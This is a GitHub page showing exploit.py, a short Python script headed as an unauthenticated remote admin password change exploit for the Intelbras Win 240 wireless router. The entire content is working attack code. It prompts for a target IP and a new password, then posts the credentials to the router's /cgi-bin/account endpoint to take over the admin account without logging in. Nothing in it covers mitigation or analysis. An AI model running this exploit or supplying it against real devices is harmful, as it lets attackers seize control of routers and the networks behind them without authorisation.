-
Notifications
You must be signed in to change notification settings - Fork 2
/
Copy pathexploit.py
38 lines (36 loc) · 1.31 KB
/
exploit.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
#!/usr/bin/python
# -*- coding: utf-8 -*-
# Exploit Title: Intelbras Wireless Router Win 240 - Unauthenticated Remote Admin Password Change
# Date: 23/04/2018
# Exploit Author: Julian Pedro
# Vendor Homepage: http://www.intelbras.com.br/empresarial/wi-fi/para-sua-casa/roteadores/win-240
# Version: Intelbras Wireless Router Win 240 V1.1.0
# Tested on: Ubuntu, Kali, Win 7
import requests # Install requests lib with pip : pip install requests
import time
ip = str(raw_input("\n[+] Insert IP Router: "))
if (ip == ""):
print("[-] Insert Valid IP")
exit()
else:
user_name = str(raw_input("[+] Insert UserName [admin]: "))
if (user_name == ""):
user_name = "admin"
new_password = str(raw_input("[+] Insert New Password: "))
if (new_password == ""):
print("[-] Insert Password")
exit()
print("[+] Sending Request For Router")
user_name_hex = user_name.encode('hex')
new_pass_hex = new_password.encode('hex')
time.sleep(1)
request = requests.post("http://"+ip+"/cgi-bin/account", data={"username":user_name,"newpass":new_password,"confpass":new_password,"USER_NAME":user_name_hex,"USER_PASSWORD":new_pass_hex})
time.sleep(2)
if (request.status_code == 200):
print("[+] Exploit Success")
print("[*] Username: %s"%(user_name))
print("[*] Password: %s"%(new_password))
exit()
else:
print("[-] Exploit Fail")
exit()